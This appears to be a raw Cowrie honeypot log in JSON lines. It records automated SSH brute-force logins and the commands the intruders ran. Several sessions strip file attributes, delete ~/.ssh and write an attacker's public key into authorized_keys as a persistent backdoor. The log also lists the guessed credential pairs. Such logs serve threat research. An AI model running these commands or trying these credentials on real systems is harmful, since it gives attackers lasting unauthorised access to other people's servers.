{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.928121Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.968373Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.969394Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":39580,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce640dacada2","protocol":"ssh","message":"New connection: 51.250.72.176:39580 (1.2.3.4:22) [session: ce640dacada2]","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.991344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.992151Z","src_ip":"51.250.72.176","session":"ce640dacada2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:15.023875Z","src_ip":"51.250.72.176","session":"ce640dacada2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:29:15.193363Z","src_ip":"51.250.72.176","session":"ce640dacada2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.227120Z","src_ip":"51.250.72.176","session":"ce640dacada2"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":40178,"dst_ip":"1.2.3.4","dst_port":22,"session":"26cdb7ee7a8f","protocol":"ssh","message":"New connection: 51.250.72.176:40178 (1.2.3.4:22) [session: 26cdb7ee7a8f]","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.273998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.274857Z","src_ip":"51.250.72.176","session":"26cdb7ee7a8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.314120Z","src_ip":"51.250.72.176","session":"26cdb7ee7a8f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.510941Z","src_ip":"51.250.72.176","session":"26cdb7ee7a8f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.551484Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:16.552330Z","src_ip":"51.250.72.176","session":"26cdb7ee7a8f"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":52048,"dst_ip":"1.2.3.4","dst_port":22,"session":"474ea4a2de5d","protocol":"ssh","message":"New connection: 5.202.105.236:52048 (1.2.3.4:22) [session: 474ea4a2de5d]","sensor":"my-vps","timestamp":"2025-09-09T00:29:18.227056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:18.231769Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:18.400855Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.login.success","username":"root","password":"123ab456","message":"login attempt [root/123ab456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:19.019629Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:19.377182Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:19.377942Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:19.378958Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:19.529528Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:19.889395Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:29:19.890149Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.049382Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.050364Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":52686,"dst_ip":"1.2.3.4","dst_port":22,"session":"21b89dded190","protocol":"ssh","message":"New connection: 5.202.105.236:52686 (1.2.3.4:22) [session: 21b89dded190]","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.177470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.178124Z","src_ip":"5.202.105.236","session":"21b89dded190"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.317279Z","src_ip":"5.202.105.236","session":"21b89dded190"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:29:20.920922Z","src_ip":"5.202.105.236","session":"21b89dded190"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.080795Z","src_ip":"5.202.105.236","session":"21b89dded190"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":53558,"dst_ip":"1.2.3.4","dst_port":22,"session":"deef5fea3b29","protocol":"ssh","message":"New connection: 5.202.105.236:53558 (1.2.3.4:22) [session: deef5fea3b29]","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.209255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.224047Z","src_ip":"5.202.105.236","session":"deef5fea3b29"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":59142,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecd97024db63","protocol":"ssh","message":"New connection: 103.100.209.195:59142 (1.2.3.4:22) [session: ecd97024db63]","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.320168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.327713Z","src_ip":"103.100.209.195","session":"ecd97024db63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.398198Z","src_ip":"5.202.105.236","session":"deef5fea3b29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.529028Z","src_ip":"103.100.209.195","session":"ecd97024db63"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:22.996813Z","src_ip":"5.202.105.236","session":"deef5fea3b29"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:23.134993Z","src_ip":"5.202.105.236","session":"474ea4a2de5d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:23.141429Z","src_ip":"5.202.105.236","session":"deef5fea3b29"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"vladimir@123","message":"login attempt [vladimir/vladimir@123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:29:23.356056Z","src_ip":"103.100.209.195","session":"ecd97024db63"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:24.565058Z","src_ip":"103.100.209.195","session":"ecd97024db63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59529,"dst_ip":"1.2.3.4","dst_port":23,"session":"4533b83bbdc9","protocol":"telnet","message":"New connection: 212.227.235.229:59529 (1.2.3.4:23) [session: 4533b83bbdc9]","sensor":"my-vps","timestamp":"2025-09-09T00:29:37.828644Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":58624,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ac1d8a78900","protocol":"ssh","message":"New connection: 43.156.132.147:58624 (1.2.3.4:22) [session: 8ac1d8a78900]","sensor":"my-vps","timestamp":"2025-09-09T00:29:47.669006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:47.669876Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:47.914933Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei1","message":"login attempt [root/huawei1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:48.934987Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:49.446004Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:49.446823Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:49.447635Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:49.700500Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:50.304615Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
